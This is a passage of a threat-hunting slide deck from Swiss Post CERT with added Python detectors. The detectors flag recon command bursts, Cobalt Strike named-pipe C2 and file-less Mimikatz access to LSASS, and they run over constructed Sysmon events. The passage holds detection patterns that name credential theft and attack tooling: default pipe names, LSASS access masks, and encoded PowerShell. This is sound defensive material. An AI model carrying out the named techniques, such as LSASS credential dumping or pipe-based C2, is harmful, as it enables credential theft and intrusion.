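    """Constructed EventCode 1 records (not real telemetry)."""
    sys32 = "C:\\Windows\\System32\\"

    def ev(host, user, minute, second, cmd, parent="cmd.exe"):
        return {"EventCode": 1, "ComputerName": host, "User": user,
                "UtcTime": datetime(2018, 6, 1, 9, minute, second),
                "Image": sys32 + cmd, "ParentImage": sys32 + parent}

    # WS001: a scripted burst of 8 commands (6 distinct) in 7 minutes, parent rundll32
    burst = ["whoami.exe", "whoami.exe", "net.exe", "net.exe", "ipconfig.exe",
             "nltest.exe", "systeminfo.exe", "tasklist.exe"]
    events = [ev("WS001", "CORP\\alice", m, 0, c, parent="rundll32.exe") for m, c in enumerate(burst)]
    # WS002: the same kind of commands spread 20 minutes apart never share a window
    events += [ev("WS002", "CORP\\bob", m, 0, c)
               for m, c in zip((0, 20, 40), ("whoami.exe", "net.exe", "ipconfig.exe"))]
    # WS003: three commands typed in cmd.exe within 90 seconds (the slide-85 "false detection")
    events += [ev("WS003", "CORP\\carol", m, s, c)
               for (m, s), c in zip(((10, 0), (10, 40), (11, 30)), ("ipconfig.exe", "whoami.exe", "net.exe"))]
    events.append(ev("WS003", "CORP\\carol", 10, 5, "notepad.exe"))   # not a recon command
    return events


if __name__ == "__main__":
    for alert in detect_recon(make_sample()):
        print(alert)
```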

SLIDE 86

Lateral Movement

• Lateral Movement using WMI for Execution

SLIDE 87

ATT&CK TTP on WMI

SLIDE 88

Who’s (ab-)using WMI


SLIDE 89

Who’s (ab-)using WMI

SLIDE 90

Who’s (ab-)using WMI

SLIDE 91

Who’s (ab-)using WMI

SLIDE 92

Who’s (ab-)using WMI

SLIDE 93

Who’s (ab-)using WMI

SLIDE 94

Testing with WMImplant

• Testing «command_exec» using WMImplant with PS-ISE

SLIDE 95

Testing with WMImplant

• Testing «process_start» using WMImplant with Beacon

SLIDE 96

Detecting WMI spawned proc’s


SLIDE 97

Detecting WMI spawned proc’s


SLIDE 98

Detecting WMI spawned proc’s

• Searching for Child-Process creations of «wmiprvse.exe»
• Filtering out «known good» processes
• Don’t filter out «Powershell.exe» in general
  – Combine with «CommandLine» params

SLIDE 99

Detecting WMI spawned proc’s

• Command executions («powershell *$env:*» and IEX, obfusc.)
• Processes started (calc.exe, notepad.exe …)

SLIDE 100

Detecting WMI spawned proc’s

• Also detecting CS Beacon’s WMI Lateral Movement method
  – «powershell.exe … -encodedcommand …»

SLIDE 101

Internal P2P C2 using Named Pipes

• Internal Peer-to-Peer C&C using Named Pipes over SMB
• Using Cobalt Strike Beacon’s features for testing

SLIDE 102

Cobalt Strike Features

Diagram labels: «Only one egress point using HTTP as C&C»; «Conn thru web proxy»; «SMB traffic between WS» (twice); «Named Pipes C&C»

SLIDE 103

Detecting C2 using Named Pipes

• Search for Processes
  – Connecting through Web Proxy and
  – Creating Named Pipes

SLIDE 104

Detecting C2 using Named Pipes

SLIDE 105

Detecting C2 using Named Pipes

SLIDE 106

Detecting C2 using Named Pipes

• Search for Processes creating «known malicious» Named Pipes
  – with or without «default PipeNames»

SLIDE 107

Detecting C2 using Named Pipes

• Searching for «custom PipeNames» only

SLIDE 108

Detecting C2 using Named Pipes

• Searching for «default & custom PipeNames»

SLIDE 109

Detecting C2 using Named Pipes

• Searching for «default & custom PipeNames»
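An added example (not the talk's code) covering slides 103 to 109: the ProcessGuid join of proxy connections (EventCode 3) with PipeCreated events (EventCode 17), plus a separate sweep for default-looking pipe names. The two name patterns come from public Sigma rules for Cobalt Strike defaults and are an assumed starter list; proxy.fqdn is the deck's placeholder.

```python
import re
from collections import defaultdict

PROXY = "proxy.fqdn"   # placeholder, as in the deck's proxy query
# Pipe-name patterns as found in public Sigma rules for Cobalt Strike defaults;
# an assumed starter list to extend from your own threat intel (slides 106 to 109).
DEFAULT_PIPE_PATTERNS = [re.compile(p, re.IGNORECASE) for p in
                         (r"^\\msse-\d+-server$", r"^\\postex_[0-9a-f]+$")]


def is_default_pipe(name: str) -> bool:
    return any(p.match(name) for p in DEFAULT_PIPE_PATTERNS)


def proxy_connectors(events):
    """(ComputerName, ProcessGuid) of processes with an EventCode 3 to the proxy."""
    return {(e["ComputerName"], e["ProcessGuid"]) for e in events
            if e["EventCode"] == 3 and e.get("DestinationHostname") == PROXY}


def pipes_created(events):
    """EventCode 17 (PipeCreated) grouped by process key -> {pipe names}."""
    pipes = defaultdict(set)
    for e in events:
        if e["EventCode"] == 17:
            pipes[(e["ComputerName"], e["ProcessGuid"])].add(e["PipeName"])
    return pipes


def images(events):
    return {(e["ComputerName"], e["ProcessGuid"]): e["Image"]
            for e in events if e["EventCode"] == 1}


def proxy_and_pipe(events):
    """Slide 103: processes that both egress through the web proxy AND create
    named pipes, i.e. the shape of a Beacon acting as the P2P hub. Each hit is
    split into default-looking and custom pipe names (slides 107 to 109)."""
    pipes, names = pipes_created(events), images(events)
    hits = []
    for key in sorted(proxy_connectors(events) & set(pipes)):
        created = sorted(pipes[key])
        hits.append({"host": key[0], "guid": key[1], "image": names.get(key, "?"),
                     "default_pipes": [p for p in created if is_default_pipe(p)],
                     "custom_pipes": [p for p in created if not is_default_pipe(p)]})
    return hits


def default_pipe_hits(events):
    """Slide 106: any process creating a known-default pipe, proxy or not."""
    names = images(events)
    return sorted((key[0], names.get(key, "?"), p)
                  for key, ps in pipes_created(events).items() for p in ps if is_default_pipe(p))


def make_sample():
    """Constructed events (not real telemetry)."""
    def ev(code, host, guid, image, **extra):
        return {"EventCode": code, "ComputerName": host, "ProcessGuid": guid, "Image": image, **extra}
    rundll = r"C:\Windows\SysWOW64\rundll32.exe"
    tmpexe = r"C:\Users\bob\AppData\Local\Temp\upd.exe"
    chrome = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
    spool = r"C:\Windows\System32\spoolsv.exe"
    return [
        ev(1, "WS001", "{g1}", rundll), ev(3, "WS001", "{g1}", rundll, DestinationHostname=PROXY),
        ev(17, "WS001", "{g1}", rundll, PipeName=r"\msse-4193-server"),          # default name
        ev(1, "WS002", "{g2}", tmpexe), ev(3, "WS002", "{g2}", tmpexe, DestinationHostname=PROXY),
        ev(17, "WS002", "{g2}", tmpexe, PipeName=r"\status_12"),                 # custom name
        ev(1, "WS003", "{g3}", chrome), ev(3, "WS003", "{g3}", chrome, DestinationHostname=PROXY),  # proxy only
        ev(1, "WS004", "{g4}", spool), ev(17, "WS004", "{g4}", spool, PipeName=r"\spoolss"),        # pipe only
        ev(1, "WS005", "{g5}", tmpexe), ev(17, "WS005", "{g5}", tmpexe, PipeName=r"\postex_1a2b"),  # default, no proxy
    ]


if __name__ == "__main__":
    print(proxy_and_pipe(make_sample()))
    print(default_pipe_hits(make_sample()))
```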

SLIDE 110

Detecting Mimikatz (even file-less)

• Detecting ProcessAccess on LSASS.exe
• Idea by Mark Russinovich (RSA talk)

SLIDE 111

Detecting Mimikatz


SLIDE 112

Detecting Mimikatz


SLIDE 113

Detecting Mimikatz


SLIDE 114

Detecting Mimikatz

• Search for ProcessAccess of LSASS.exe
  – GrantedAccess of: 0x1010, 0x1410, 0x143A
  – CallTrace: KERNELBASE.dll and (ntdll.dll or UNKNOWN)
  – …

SLIDE 115

Detecting Mimikatz

• Mimikatz executable from Github
  – ✓ File-based
  – ✗ No «UNKNOWN» from shellcode / injection

SLIDE 116

Detecting Mimikatz

• Cobalt Strike Beacon’s built-in Mimikatz «logonpasswords»
  – ✓ File-less
  – ✓ «UNKNOWN» from shellcode / injection

SLIDE 117

Detecting Mimikatz

• Invoke-Mimikatz using PowerPick from Cobalt Strike’s Beacon
  – ✓ File-less
  – ✓ «UNKNOWN» from shellcode / injection

SLIDE 118

Detecting Mimikatz

• Don’t search for specific SourceImage names
  – e.g. Rundll32.exe: it could be really anything! (even cmd.exe ☺)
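An added example, not from the talk, that encodes the ProcessAccess rule of slides 114 to 118 over constructed EventCode 10 records: lsass.exe as target, the three GrantedAccess masks, the KERNELBASE/ntdll/UNKNOWN call-trace test, and no dependence on SourceImage.

```python
GRANTED_ACCESS_OF_INTEREST = {0x1010, 0x1410, 0x143A}   # slide 114


def is_lsass_credential_access(e: dict) -> bool:
    """EventCode 10 (ProcessAccess) whose target is lsass.exe, whose GrantedAccess
    mask is one of the slide's values, and whose CallTrace passes through
    KERNELBASE.dll and then either ntdll.dll or an UNKNOWN (unbacked) region.
    SourceImage is deliberately not consulted (slide 118): the caller can be
    any host process once the payload has been injected."""
    if e["EventCode"] != 10:
        return False
    if not e.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return False
    try:
        granted = int(e.get("GrantedAccess", "0"), 16)
    except ValueError:
        return False
    if granted not in GRANTED_ACCESS_OF_INTEREST:
        return False
    trace = e.get("CallTrace", "").upper()
    return "KERNELBASE.DLL" in trace and ("NTDLL.DLL" in trace or "UNKNOWN" in trace)


def hunt_lsass_access(events):
    """Return (SourceImage, GrantedAccess, file_less) per hit; file_less is True
    when an UNKNOWN frame was present, the shellcode/injection signal from
    slides 115 to 117."""
    return [(e["SourceImage"], e["GrantedAccess"], "UNKNOWN" in e.get("CallTrace", "").upper())
            for e in events if is_lsass_credential_access(e)]


def make_sample():
    """Constructed EventCode 10 records (not real telemetry). Call traces are
    shortened to the module names that matter for the rule."""
    lsass = r"C:\Windows\System32\lsass.exe"
    ntdll, kb = r"C:\Windows\SYSTEM32\ntdll.dll+9c534", r"C:\Windows\System32\KERNELBASE.dll+2c4d6"

    def ev(source, target, granted, trace):
        return {"EventCode": 10, "SourceImage": source, "TargetImage": target,
                "GrantedAccess": granted, "CallTrace": "|".join(trace)}

    return [
        # slides 116/117: in-memory tooling inside rundll32, unbacked return address
        ev(r"C:\Windows\SysWOW64\rundll32.exe", lsass, "0x1010", (ntdll, kb, "UNKNOWN(000001F2A5D10000)")),
        # slide 115: file-based tool, frames backed by its own image
        ev(r"C:\tools\mimikatz.exe", lsass, "0x1410", (ntdll, kb, r"C:\tools\mimikatz.exe+1a2b")),
        # slide 118: the caller may be anything, even cmd.exe
        ev(r"C:\Windows\System32\cmd.exe", lsass, "0x143a", (ntdll, kb, "UNKNOWN(00007FF8AA000000)")),
        # antivirus engine opening lsass with full access: not one of the listed masks
        ev(r"C:\Program Files\AV\engine.exe", lsass, "0x1FFFFF", (ntdll, kb, r"C:\Program Files\AV\engine.exe+5")),
        # system process with a listed mask but no KERNELBASE frame
        ev(r"C:\Windows\System32\csrss.exe", lsass, "0x1410", (ntdll, r"C:\Windows\System32\csrsrv.dll+3f")),
        # same mask and trace shape, but a different target process
        ev(r"C:\Windows\SysWOW64\rundll32.exe", r"C:\Windows\explorer.exe", "0x1010", (ntdll, kb, "UNKNOWN(0)")),
    ]


if __name__ == "__main__":
    for hit in hunt_lsass_access(make_sample()):
        print(hit)
```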

SLIDE 119

Detecting Mimikatz (OpenProcess)

SLIDE 120

Detecting Mimikatz (OpenProcess)

SLIDE 121

Sysmon – what to do now?

NEW

SLIDE 122

Sysmon – what to do now?

NEW

SLIDE 123

Sysmon – what to do now?

NEW

SLIDE 124

Why care about WMI events?

NEW

SLIDE 125

Why care about WMI events?

NEW

SLIDE 126

I have some questions…

• Please stand up…
• Sit down if you…
  – didn’t learn anything new (resources, examples)
  – detect internal C&C using Named Pipes over SMB
  – detect in-memory / file-less Mimikatz on (all of) your hosts
    – Bonus: all versions of Mimikatz?
• Everyone sitting now, I would like to have a chat ☺

SLIDE 127

Do you have questions?

• Is there time left for Q&A?

SLIDE 128

Thank you for your attention!

Tom Ueltschi, Swiss Post CERT
